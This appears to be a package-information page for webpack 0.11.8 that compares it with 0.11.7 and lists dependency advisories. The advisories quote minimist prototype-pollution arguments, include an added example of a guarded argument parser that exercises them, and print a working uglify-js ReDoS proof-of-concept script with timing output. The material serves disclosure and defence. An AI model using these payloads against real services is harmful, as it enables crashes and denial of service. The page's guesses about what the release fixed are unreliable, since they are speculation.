Webpack version 0.11.8, released on November 27, 2013, represents a minor update over version 0.11.7, which was released just a day prior on November 26, 2013. Both versions offer the core functionalities of webpack: packing CommonJs, AMD, and labeled modules for browser deployment, allowing for code splitting into bundles, and supporting loaders for preprocessing various file types like JSON, Jade, CoffeeScript, CSS, and Less. This enables developers to efficiently manage and optimize their web application's assets.
The dependency and devDependency lists remain identical between the two versions, including essential tools such as async, clone, uglify-js for optimization and code management, and loaders like css-loader, less-loader, and coffee-loader for seamless integration of different file types. This consistency ensures that upgrading from 0.11.7 to 0.11.8 should be a straightforward process with minimal compatibility concerns.
While the specific changes between these two versions are not explicitly detailed in the provided metadata, the quick release cycle suggests that version 0.11.8 likely addresses minor bug fixes, performance improvements, or potentially security patches identified shortly after the release of 0.11.7. For developers using webpack in their projects, upgrading to the latest minor version is generally recommended to benefit from these improvements and ensure the stability and security of their build process. Both versions rely on a similar architecture built around loaders, plugins and the core compilation of assets to build a comprehensive web application bundler.
Vulnerabilities related to version 0.11.8 of the package
Prototype Pollution in minimist
Affected versions of minimist are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of Object, causing the addition or modification of an existing property that will exist on all objects.
Parsing the argument --__proto__.y=Polluted adds a y property with value Polluted to all objects. The argument --__proto__=Polluted raises an uncaught error and crashes the application.
This is exploitable if attackers have control over the arguments being passed to minimist.
Upgrade to versions 0.2.1, 1.2.3 or later.
Prototype Pollution in minimist
Minimist prior to 1.2.6 and 0.2.4 is vulnerable to Prototype Pollution via file index.js, function setKey() (lines 69-95).
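Both minimist advisories above come down to the same defect: a dotted key such as __proto__.y is walked segment by segment and written into a plain object without rejecting segments that reach Object.prototype. The following is an added example, not code from minimist or webpack, of a minimal argument parser in the style of minimist's setKey() with the guard that fixed versions apply; parseArgs, setKeySafe and isDangerousKeyPath are hypothetical names, and only the --key=value and --key forms are handled.

```javascript
'use strict';

// Path segments that must never be used when writing into a plain object:
// each one reaches Object.prototype or a constructor rather than the target.
const FORBIDDEN_SEGMENTS = new Set(['__proto__', 'constructor', 'prototype']);

// True if any segment of a dotted key could write outside the target object.
// Assumption: keys are split on '.', as minimist does for --a.b.c=value.
function isDangerousKeyPath(key) {
  return key.split('.').some((seg) => FORBIDDEN_SEGMENTS.has(seg));
}

// Writes value at a dotted key path into target. Refuses dangerous segments
// up front and only descends into own, plain-object properties, so an
// inherited property is never used as an intermediate container.
function setKeySafe(target, key, value) {
  if (isDangerousKeyPath(key)) return false;
  const segs = key.split('.');
  let obj = target;
  for (let i = 0; i < segs.length - 1; i++) {
    const seg = segs[i];
    const own = Object.prototype.hasOwnProperty.call(obj, seg);
    if (!own || typeof obj[seg] !== 'object' || obj[seg] === null) {
      obj[seg] = {};
    }
    obj = obj[seg];
  }
  obj[segs[segs.length - 1]] = value;
  return true;
}

// Parses --key=value and --key (boolean) arguments; anything else is kept
// as a positional in argv._. Rejected keys are reported instead of applied.
function parseArgs(args) {
  const argv = { _: [] };
  const rejected = [];
  for (const arg of args) {
    const m = /^--([^=]+)(?:=(.*))?$/.exec(arg);
    if (!m) { argv._.push(arg); continue; }
    const value = m[2] === undefined ? true : m[2];
    if (!setKeySafe(argv, m[1], value)) rejected.push(m[1]);
  }
  return { argv, rejected };
}

// Constructed sample: the two payloads from the advisory plus a benign key.
const demo = parseArgs(['--__proto__.y=Polluted', '--__proto__=Polluted', '--a.b=1', 'file']);
console.log(JSON.stringify(demo), 'polluted:', ({}).y !== undefined);
```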
Regular Expression Denial of Service in uglify-js
Versions of uglify-js prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the parse() method.
var u = require('uglify-js');

// Builds a string of `len` copies of `chr`; the long numeric literal it
// produces is what makes parse() spend quadratic time in its regex.
var genstr = function (len, chr) {
    var result = "";
    for (var i = 0; i < len; i++) {   // original used an undeclared `i` and `<=`
        result = result + chr;
    }
    return result;
};

// The digit count comes from the command line, e.g. `node test.js 10000`.
u.parse("var a = " + genstr(parseInt(process.argv[2], 10), "1") + ".1ee7;");
$ time node test.js 10000
real 0m1.091s
user 0m1.047s
sys 0m0.039s
$ time node test.js 80000
real 0m6.486s
user 0m6.229s
sys 0m0.094s
Update to version 2.6.0 or later.